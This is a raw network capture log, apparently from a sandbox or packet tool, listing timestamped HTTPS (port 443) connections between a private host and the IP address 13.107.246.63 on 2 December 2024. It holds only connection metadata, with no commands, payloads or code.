                                                          Dec 2, 2024 17:57:34.943289042 CET49967443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.943296909 CET4434996713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.972294092 CET4434996613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.972347975 CET4434996613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.972434044 CET49966443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.972624063 CET49966443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.972646952 CET4434996613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.972685099 CET49966443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.972691059 CET4434996613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.975431919 CET49971443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.975476027 CET4434997113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.975544930 CET49971443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.975701094 CET49971443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.975714922 CET4434997113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:35.395771980 CET4434996713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:35.399338007 CET4434996713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:35.399393082 CET4434996713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:35.399393082 CET49967443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:35.399442911 CET49967443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:35.406146049 CET49967443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:35.406183004 CET4434996713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:35.406200886 CET49967443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:35.406208992 CET4434996713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:35.409781933 CET49972443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:35.409811974 CET4434997213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:35.409883976 CET49972443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:35.410027027 CET49972443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:35.410042048 CET4434997213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:35.933691025 CET4434996813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:35.934195995 CET49968443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:35.934218884 CET4434996813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:35.934737921 CET49968443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:35.934745073 CET4434996813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.009716988 CET4434996913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.010088921 CET49969443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.010118008 CET4434996913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.010606050 CET49969443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.010611057 CET4434996913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.361957073 CET4434997013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.362668991 CET49970443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.362694979 CET4434997013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.363348007 CET49970443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.363352060 CET4434997013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.377805948 CET4434996813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.381290913 CET4434996813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.381541014 CET49968443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.381562948 CET49968443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.381577015 CET4434996813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.381588936 CET49968443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.381592989 CET4434996813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.384063005 CET49973443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.384110928 CET4434997313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.384181023 CET49973443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.384342909 CET49973443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.384356976 CET4434997313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.490333080 CET4434996913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.493474007 CET4434996913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.493531942 CET4434996913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.493634939 CET49969443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.493634939 CET49969443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.493634939 CET49969443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.493680000 CET49969443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.493695974 CET4434996913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.496212959 CET49974443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.496259928 CET4434997413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.496329069 CET49974443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.496452093 CET49974443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.496469021 CET4434997413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.700191021 CET4434997113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.700635910 CET49971443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.700673103 CET4434997113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.701066017 CET49971443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.701071978 CET4434997113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.800558090 CET4434997013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.800652027 CET4434997013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.800839901 CET49970443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.800894022 CET49970443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.800910950 CET4434997013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.800920963 CET49970443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.800925970 CET4434997013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.803503990 CET49975443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.803527117 CET4434997513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:36.803596973 CET49975443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.803729057 CET49975443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:36.803740025 CET4434997513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.135993958 CET4434997113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.138699055 CET4434997113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.138758898 CET49971443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.138823032 CET49971443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.138840914 CET4434997113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.138850927 CET49971443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.138855934 CET4434997113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.141561985 CET49976443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.141601086 CET4434997613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.141665936 CET49976443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.141793966 CET49976443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.141808987 CET4434997613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.193327904 CET4434997213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.193762064 CET49972443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.193792105 CET4434997213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.194215059 CET49972443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.194221973 CET4434997213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.638808012 CET4434997213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.642407894 CET4434997213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.642455101 CET4434997213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.642467976 CET49972443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.642515898 CET49972443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.642563105 CET49972443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.642586946 CET4434997213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.642601013 CET49972443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.642608881 CET4434997213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.645395041 CET49977443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.645437956 CET4434997713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:37.645522118 CET49977443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.645674944 CET49977443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:37.645689011 CET4434997713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.296953917 CET4434997413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.297480106 CET49974443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:38.297511101 CET4434997413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.297952890 CET49974443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:38.297961950 CET4434997413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.583689928 CET4434997513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.584990978 CET49975443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:38.585038900 CET4434997513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.585560083 CET49975443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:38.585566044 CET4434997513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.741133928 CET4434997413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.744512081 CET4434997413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.744587898 CET49974443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:38.744637012 CET49974443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:38.744668961 CET4434997413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.744685888 CET49974443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:38.744693995 CET4434997413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.747522116 CET49978443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:38.747562885 CET4434997813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:38.747648001 CET49978443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:38.747811079 CET49978443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:38.747826099 CET4434997813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.029206038 CET4434997513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.032013893 CET4434997513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.032068968 CET4434997513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.032107115 CET49975443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.032231092 CET49975443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.032367945 CET49975443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.032392025 CET4434997513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.032408953 CET49975443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.032413960 CET4434997513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.035363913 CET49979443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.035407066 CET4434997913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.035475016 CET49979443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.035649061 CET49979443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.035664082 CET4434997913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.163907051 CET4434997613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.197019100 CET49976443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.197035074 CET4434997613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.200889111 CET49976443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.200894117 CET4434997613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.430620909 CET4434997713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.431195021 CET49977443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.431229115 CET4434997713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.431687117 CET49977443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.431694031 CET4434997713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.839052916 CET4434997613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.841995955 CET4434997613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.842165947 CET49976443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.842725992 CET49976443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.842749119 CET4434997613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.842760086 CET49976443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.842775106 CET4434997613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.846043110 CET49980443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.846076965 CET4434998013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.846132040 CET49980443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.846362114 CET49980443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.846375942 CET4434998013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.878102064 CET4434997713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.881190062 CET4434997713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.881241083 CET4434997713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.881241083 CET49977443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.881310940 CET49977443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.881380081 CET49977443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.881397963 CET4434997713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.881407976 CET49977443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.881413937 CET4434997713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.884043932 CET49981443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.884079933 CET4434998113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:39.884150982 CET49981443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.884280920 CET49981443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:39.884294987 CET4434998113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:40.546475887 CET4434997813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:40.547363043 CET49978443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:40.547382116 CET4434997813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:40.547802925 CET49978443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:40.547808886 CET4434997813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:40.755198002 CET4434997913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:40.755767107 CET49979443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:40.755856991 CET4434997913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:40.756225109 CET49979443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:40.756231070 CET4434997913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:40.996788979 CET4434997813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:40.997068882 CET4434997813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:40.997150898 CET49978443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:40.997252941 CET49978443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:40.997267962 CET4434997813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:40.997306108 CET49978443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:40.997312069 CET4434997813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.000150919 CET49982443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.000190973 CET4434998213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.000251055 CET49982443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.000379086 CET49982443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.000390053 CET4434998213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.199400902 CET4434997913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.202975035 CET4434997913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.203047037 CET49979443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.203160048 CET49979443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.203183889 CET4434997913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.203201056 CET49979443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.203207016 CET4434997913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.205889940 CET49983443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.205925941 CET4434998313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.206002951 CET49983443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.206152916 CET49983443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.206166983 CET4434998313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.586668015 CET4434998013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.630678892 CET49980443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.634792089 CET4434998113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.637691975 CET49980443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.637702942 CET4434998013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.638215065 CET49980443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.638217926 CET4434998013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.639178991 CET49981443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.639211893 CET4434998113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:41.639630079 CET49981443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:41.639637947 CET4434998113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.030038118 CET4434998013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.034368992 CET4434998013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.034418106 CET4434998013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.034418106 CET49980443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.034476042 CET49980443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.034509897 CET49980443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.034527063 CET4434998013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.034537077 CET49980443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.034542084 CET4434998013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.037828922 CET49984443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.037884951 CET4434998413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.037951946 CET49984443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.038109064 CET49984443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.038126945 CET4434998413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.080241919 CET4434998113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.080303907 CET4434998113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.080353022 CET49981443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.080463886 CET49981443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.080480099 CET4434998113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.080492973 CET49981443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.080499887 CET4434998113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.082799911 CET49985443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.082833052 CET4434998513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.082894087 CET49985443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.083075047 CET49985443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.083090067 CET4434998513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.361273050 CET4434997313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.361921072 CET49973443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.361957073 CET4434997313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.362293959 CET49973443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.362299919 CET4434997313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.737287998 CET4434998213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.738030910 CET49982443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.738053083 CET4434998213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.738502979 CET49982443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.738507986 CET4434998213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.798485041 CET4434997313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.801492929 CET4434997313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.801559925 CET49973443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.801599979 CET49973443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.801616907 CET4434997313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.801630020 CET49973443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.801635027 CET4434997313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.804619074 CET49986443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.804651976 CET4434998613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:42.804734945 CET49986443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.804891109 CET49986443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:42.804903984 CET4434998613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.069917917 CET4434998313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.070400000 CET49983443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.070420027 CET4434998313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.070872068 CET49983443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.070875883 CET4434998313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.172563076 CET4434998213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.175698042 CET4434998213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.175761938 CET49982443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.175791025 CET49982443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.175806046 CET4434998213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.175816059 CET49982443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.175820112 CET4434998213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.178648949 CET49987443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.178668022 CET4434998713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.178729057 CET49987443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.178848982 CET49987443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.178862095 CET4434998713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.568557978 CET4434998313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.568588972 CET4434998313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.568639994 CET4434998313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.568660021 CET49983443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.568686962 CET49983443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.569674969 CET49983443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.569690943 CET4434998313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.569724083 CET49983443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.569729090 CET4434998313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.572535038 CET49988443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.572577000 CET4434998813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.572647095 CET49988443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.572824955 CET49988443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.572837114 CET4434998813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.774648905 CET4434998413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.775168896 CET49984443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.775228024 CET4434998413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.775618076 CET49984443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.775624037 CET4434998413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.801709890 CET4434998513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.802045107 CET49985443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.802062035 CET4434998513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:43.802423954 CET49985443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:43.802428007 CET4434998513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.211071968 CET4434998413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.211143017 CET4434998413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.211261034 CET49984443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.211689949 CET49984443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.211711884 CET4434998413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.211723089 CET49984443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.211729050 CET4434998413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.214581013 CET49989443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.214617014 CET4434998913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.214879036 CET49989443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.214879036 CET49989443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.214909077 CET4434998913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.364845991 CET4434998513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.367980957 CET4434998513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.368057966 CET49985443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.368065119 CET4434998513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.368107080 CET49985443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.369370937 CET49985443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.369389057 CET4434998513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.369402885 CET49985443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:44.369409084 CET4434998513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:44.372189045 CET49990443192.168.2.413.107.246.63
